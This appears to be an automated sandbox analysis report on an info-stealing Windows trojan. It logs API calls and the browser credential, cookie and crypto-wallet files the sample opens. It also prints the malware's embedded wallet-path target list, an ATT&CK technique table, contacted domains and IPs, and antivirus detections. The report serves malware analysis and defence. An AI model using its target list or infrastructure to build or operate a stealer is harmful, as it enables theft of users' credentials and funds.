                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_00945573
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00949EFE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0094E6FF
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: EnumSystemLocalesA,2_2_0094B6E6
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0094B624
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_0094762C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0094B7B3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0094B710
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00947706
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00948F54
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0094B777
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 0_2_005E43A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005E43A3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930C28 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00930C28
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00930D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00930D03
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD8390 NSS_GetVersion,2_2_6CAD8390
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara match File source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90C40 sqlite3_bind_zeroblob,2_2_6CB90C40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90D60 sqlite3_bind_parameter_name,2_2_6CB90D60
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB8EA0 sqlite3_clear_bindings,2_2_6CAB8EA0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6CB90B40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB6410 bind,WSAGetLastError,2_2_6CAB6410
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB60B0 listen,WSAGetLastError,2_2_6CAB60B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CABC030 sqlite3_bind_parameter_count,2_2_6CABC030
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB6070 PR_Listen,2_2_6CAB6070
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CABC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6CABC050
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA422D0 sqlite3_bind_blob,2_2_6CA422D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB63C0 PR_Bind,2_2_6CAB63C0
                          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                          | Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 31 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                          | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 56 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
                          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 12 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Behavior graph. Behavior Graph ID: 1539807; Sample: 7ZthFNAqYp.exe; Startdate: 23/10/2024; Architecture: WINDOWS; Score: 100
• Sample level: domains t.me, steamcommunity.com, cowod.hopto.org; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 9 other signatures
• 7ZthFNAqYp.exe (started): dropped C:\Users\user\Music\...\AttoConvertVideo.exe, PE32; signatures: Detected unpacking (creates a PE file in dynamic memory); Contains functionality to inject code into remote processes; Drops large PE files; 2 other signatures
• 7ZthFNAqYp.exe (started by the process above): contacted t.me 149.154.167.99, 443, 49940 (TELEGRAMRU, United Kingdom); 95.217.220.103, 443, 49989, 49990 (HETZNER-ASDE, Germany); 2 other IPs or domains; dropped C:\ProgramData\vcruntime140.dll, PE32; C:\ProgramData\softokn3.dll, PE32; C:\ProgramData\nss3.dll, PE32; 3 other files (none is malicious); signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 4 other signatures

Source | Detection | Scanner | Label | Link
7ZthFNAqYp.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
7ZthFNAqYp.exe | 44% | Virustotal | | Browse
7ZthFNAqYp.exe | 100% | Avira | TR/Redcap.xalcz |

Source | Detection | Scanner | Label | Link
